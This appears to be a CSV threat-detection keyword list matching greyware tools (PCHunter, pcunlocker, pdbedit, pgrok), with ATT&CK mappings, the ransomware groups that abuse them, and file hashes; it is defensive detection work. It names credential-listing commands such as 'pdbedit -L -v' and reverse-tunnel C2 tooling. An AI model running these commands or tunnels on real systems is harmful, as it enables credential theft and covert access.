"*http://www.epoolsoft.com/pchunter/pchunter_free*",".{0,1000}http\:\/\/www\.epoolsoft\.com\/pchunter\/pchunter_free.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*http://www.epoolsoft.com/PCHunter_Standard*",".{0,1000}http\:\/\/www\.epoolsoft\.com\/PCHunter_Standard.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://www.majorgeeks.com/files/details/pc_hunter.html*",".{0,1000}https\:\/\/www\.majorgeeks\.com\/files\/details\/pc_hunter\.html.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*PCHunter32.exe*",".{0,1000}PCHunter32\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*PCHunter64.exe*",".{0,1000}PCHunter64\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/download/pcunlocker*",".{0,1000}\/download\/pcunlocker.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pcunlocker.iso*",".{0,1000}\/pcunlocker\.iso.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pcunlocker_trial.zip*",".{0,1000}\/pcunlocker_trial\.zip.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pcunlocker.iso*",".{0,1000}\\pcunlocker\.iso.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pcunlocker_trial.zip*",".{0,1000}\\pcunlocker_trial\.zip.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pcunlocker_ent_trial.zip*",".{0,1000}pcunlocker_ent_trial\.zip.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pdbedit -L -v*",".{0,1000}pdbedit\s\-L\s\-v.{0,1000}","greyware_tool_keyword","pdbedit","Sets the smbpasswd listing format. It will make pdbedit list the users in the database - printing out the account fields in a format compatible with the smbpasswd file format.","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*pdbedit -L -w*",".{0,1000}pdbedit\s\-L\s\-w.{0,1000}","greyware_tool_keyword","pdbedit","Enables the verbose listing format. It causes pdbedit to list the users in the database - printing out the account fields in a descriptive format","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"* install pgrok*",".{0,1000}\sinstall\spgrok.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"* pgrok.exe*",".{0,1000}\spgrok\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z"
"* pgrokd.exe*",".{0,1000}\spgrokd\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z"
"*/app/pgrokd/*",".{0,1000}\/app\/pgrokd\/.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*/pgrok.exe*",".{0,1000}\/pgrok\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","1","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z"
"*/pgrok.git*",".{0,1000}\/pgrok\.git.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*/pgrok.yml*",".{0,1000}\/pgrok\.yml.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*/pgrokd.exe*",".{0,1000}\/pgrokd\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","1","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z"
"*/pgrokd.yml",".{0,1000}\/pgrokd\.yml","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*/pgrokd_*.zip*",".{0,1000}\/pgrokd_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*/var/opt/pgrokd*",".{0,1000}\/var\/opt\/pgrokd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*\pgrok.exe*",".{0,1000}\\pgrok\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z"
"*\pgrok.yml*",".{0,1000}\\pgrok\.yml.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*\pgrokd.exe*",".{0,1000}\\pgrokd\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z"
"*\pgrokd.yml",".{0,1000}\\pgrokd\.yml","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*\pgrokd_*.zip*",".{0,1000}\\pgrokd_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*>Poor man's ngrok<*",".{0,1000}\>Poor\sman\'s\sngrok\<.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*00440c4525e995e54ce65e9d0c85f7482136463c9109c61650687226aca149bc*",".{0,1000}00440c4525e995e54ce65e9d0c85f7482136463c9109c61650687226aca149bc.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*068793abf6b6c18bfcc9f22207b12de7f25d922960cd5b48e3547851216bc456*",".{0,1000}068793abf6b6c18bfcc9f22207b12de7f25d922960cd5b48e3547851216bc456.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*073f9b935fa7e67e49cdd53823955c3ec8291fefcc39516f88ac57e2dd9131a1*",".{0,1000}073f9b935fa7e67e49cdd53823955c3ec8291fefcc39516f88ac57e2dd9131a1.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*0c20cf6d65d5dfc9f36005813dc82517043fd635cbb571aa1c1039d3cd5161ec*",".{0,1000}0c20cf6d65d5dfc9f36005813dc82517043fd635cbb571aa1c1039d3cd5161ec.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*0fc8c8a3c45bf30f1f09ae9c74e8986c367958d81ba2001c23ee536ca0227fbe*",".{0,1000}0fc8c8a3c45bf30f1f09ae9c74e8986c367958d81ba2001c23ee536ca0227fbe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*1079079045b66cde89827c0129aff180ad2d67fda71415164a2a3e98f37c40e7*",".{0,1000}1079079045b66cde89827c0129aff180ad2d67fda71415164a2a3e98f37c40e7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*116fae615a600632bd007ea8608b2c814c55a02324f9b8cdd75e63e2b71d53ba*",".{0,1000}116fae615a600632bd007ea8608b2c814c55a02324f9b8cdd75e63e2b71d53ba.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*11f6bee5589f447de6fa74890630deb8fc33cae47fdf31907b705a05a27e39b5*",".{0,1000}11f6bee5589f447de6fa74890630deb8fc33cae47fdf31907b705a05a27e39b5.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*17db2b8cf5cb903ef0b04dc10dfa5f24fd9ce7ec75674219f322b15d706935eb*",".{0,1000}17db2b8cf5cb903ef0b04dc10dfa5f24fd9ce7ec75674219f322b15d706935eb.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*1fe3604bdf69ff5a881a77258a10583a3fea5958aaab958ee4c22080635f64ba*",".{0,1000}1fe3604bdf69ff5a881a77258a10583a3fea5958aaab958ee4c22080635f64ba.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*22415883e18cde6e909ddcf683ded67fa419a726557f7124636f980e64b04576*",".{0,1000}22415883e18cde6e909ddcf683ded67fa419a726557f7124636f980e64b04576.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*2b92a08a76d9b0e13e41660fdc2491eaeda7b8400f9d29542f27ad2edd004d9f*",".{0,1000}2b92a08a76d9b0e13e41660fdc2491eaeda7b8400f9d29542f27ad2edd004d9f.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*2bf454abbd1446061cac6ee9f57b12c572c07a3093e45e29b0cdc088ab18238e*",".{0,1000}2bf454abbd1446061cac6ee9f57b12c572c07a3093e45e29b0cdc088ab18238e.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*2eb58b8d72bebd6f4ca4d55ac855dae5dd7f29b825ad14aba8e4a96e19c5ae54*",".{0,1000}2eb58b8d72bebd6f4ca4d55ac855dae5dd7f29b825ad14aba8e4a96e19c5ae54.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*31dc3fe53dd1ad80d2c5e6ffa9221b62385b1cd2f16ecc240cd59e5f485155cd*",".{0,1000}31dc3fe53dd1ad80d2c5e6ffa9221b62385b1cd2f16ecc240cd59e5f485155cd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*349d0d0ecabf954caa8a1a78ab35b16bbc625424e827e008db1c76fd4bd29dc5*",".{0,1000}349d0d0ecabf954caa8a1a78ab35b16bbc625424e827e008db1c76fd4bd29dc5.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*35d6b2ef9a31b54ebee2a29bf22bb623bb5c9a74110472268581d6ea8122132c*",".{0,1000}35d6b2ef9a31b54ebee2a29bf22bb623bb5c9a74110472268581d6ea8122132c.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*3892f45ccf44d24fbe3b48933a876414e79e8e9a35f3924ef2dd1c63053f4656*",".{0,1000}3892f45ccf44d24fbe3b48933a876414e79e8e9a35f3924ef2dd1c63053f4656.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*3da0eb5c83daa77c9e52759d3b668774b0bccbe16b87c74301ec08979ffb15d4*",".{0,1000}3da0eb5c83daa77c9e52759d3b668774b0bccbe16b87c74301ec08979ffb15d4.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*3f06328ca39cad23ca718129de65b24c3630dbc51fb473b42405c18a23e21992*",".{0,1000}3f06328ca39cad23ca718129de65b24c3630dbc51fb473b42405c18a23e21992.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*4071819358aab734ff8346fa8540427d3735d964d636af6a803f84433e9ca03a*",".{0,1000}4071819358aab734ff8346fa8540427d3735d964d636af6a803f84433e9ca03a.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*43c68bdc9adf3cea7c3643492732aac7e8731d0abd50fdeab1f9b078801d41a8*",".{0,1000}43c68bdc9adf3cea7c3643492732aac7e8731d0abd50fdeab1f9b078801d41a8.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*46d4423a5cf1811ceb701cd756aa94bcc6d53a3c4ca49d961a4fd2b2a75ab300*",".{0,1000}46d4423a5cf1811ceb701cd756aa94bcc6d53a3c4ca49d961a4fd2b2a75ab300.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*47fd3fa87768d26e5e71cd73d507d5faf8ec898ead1ec46487e54c8e0ed63838*",".{0,1000}47fd3fa87768d26e5e71cd73d507d5faf8ec898ead1ec46487e54c8e0ed63838.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*48a3acd3b29c436bb696a1486128fa509bd08323eadafb8c7dad54882b45b8f4*",".{0,1000}48a3acd3b29c436bb696a1486128fa509bd08323eadafb8c7dad54882b45b8f4.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*4973faa197eedbe906929425c2f85a2f29411fd84e1b0599e4951c07fe5f37be*",".{0,1000}4973faa197eedbe906929425c2f85a2f29411fd84e1b0599e4951c07fe5f37be.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*4aa6c882ba3b5d8a4a62f183f4ea878a9d86dda8e6713c44f0bb16528bc124df*",".{0,1000}4aa6c882ba3b5d8a4a62f183f4ea878a9d86dda8e6713c44f0bb16528bc124df.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*51ae744086e74f4266459e4fec04b65386dce95598a87b961398f85119bbf701*",".{0,1000}51ae744086e74f4266459e4fec04b65386dce95598a87b961398f85119bbf701.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*53cb0a4c9d99d9fa9ceb83bc5fe6ac1f8f7100130b1597d9eb71b3a9fdb01fcd*",".{0,1000}53cb0a4c9d99d9fa9ceb83bc5fe6ac1f8f7100130b1597d9eb71b3a9fdb01fcd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*5579149600842ad916cf87ca07c8b8fd81b4a5737d28ba2c66b1e2c72a8cf036*",".{0,1000}5579149600842ad916cf87ca07c8b8fd81b4a5737d28ba2c66b1e2c72a8cf036.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*57ec0021464f26379ee9242f6b517b4276fb7e431cd963df8950dcec8c83d6ba*",".{0,1000}57ec0021464f26379ee9242f6b517b4276fb7e431cd963df8950dcec8c83d6ba.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*5829a7b027c1fe0c12ba6e6fa4e53e8d21c94de346c0c3919a73da2565561979*",".{0,1000}5829a7b027c1fe0c12ba6e6fa4e53e8d21c94de346c0c3919a73da2565561979.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*5b5327952836163d6a5c2a9ae0d300daebcae8b8066fd2cebf1e3907ccb0b3fd*",".{0,1000}5b5327952836163d6a5c2a9ae0d300daebcae8b8066fd2cebf1e3907ccb0b3fd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*5e2b755a50d007fc6f5807bae412ea3d35ca448bda47423e0f80a3692e3455a6*",".{0,1000}5e2b755a50d007fc6f5807bae412ea3d35ca448bda47423e0f80a3692e3455a6.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
